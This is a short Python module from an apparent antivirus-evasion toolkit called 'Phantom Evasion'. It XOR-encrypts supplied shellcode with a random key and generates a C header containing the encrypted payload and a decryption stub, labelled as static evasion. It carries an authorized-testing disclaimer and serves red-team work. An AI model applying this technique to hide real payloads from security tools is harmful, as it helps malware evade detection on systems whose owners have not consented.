"""
Phantom Evasion - XOR Encryption Technique

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

import os
import random
from typing import Dict, Any


def generate_xor_encryption(shellcode: bytes) -> Dict[str, Any]:
    """XOR-encrypt *shellcode* with a randomly generated multi-byte key.

    Returns a dict containing:
        - ``code``               – C source string with encrypted data + decrypt stub
        - ``encrypted_shellcode`` – encrypted bytes
        - ``key``                – raw key bytes
        - ``description``        – human-readable technique summary
        - ``layer``              – defensive layer label
        - ``name``               – technique name
    """
    key = os.urandom(random.randint(4, 32))
    encrypted = bytes([b ^ key[i % len(key)] for i, b in enumerate(shellcode)])

    sc_array = ", ".join(f"0x{b:02x}" for b in encrypted)
    key_array = ", ".join(f"0x{b:02x}" for b in key)

    code = f"""\
#ifndef __PHANTOM_XOR_ENCRYPT__
#define __PHANTOM_XOR_ENCRYPT__
// XOR Decryption Routine – generated by Phantom Evasion
// Layer 1 – Static Evasion
unsigned char encrypted_shellcode[] = {{{sc_array}}};
unsigned char xor_key[] = {{{key_array}}};
size_t shellcode_len = {len(encrypted)};
size_t key_len = {len(key)};

void xor_decrypt(unsigned char *data, size_t data_len,
                 unsigned char *key, size_t key_len) {{
    for (size_t i = 0; i < data_len; i++) {{
        data[i] ^= key[i % key_len];
    }}
}}
#endif /* __PHANTOM_XOR_ENCRYPT__ */
"""

    return {
        "code": code,
        "encrypted_shellcode": encrypted,
        "key": key,
        "description": "XOR encryption with random multi-byte key",
        "layer": "Layer 1 - Static Evasion",
        "name": "xor_encrypt",
    }
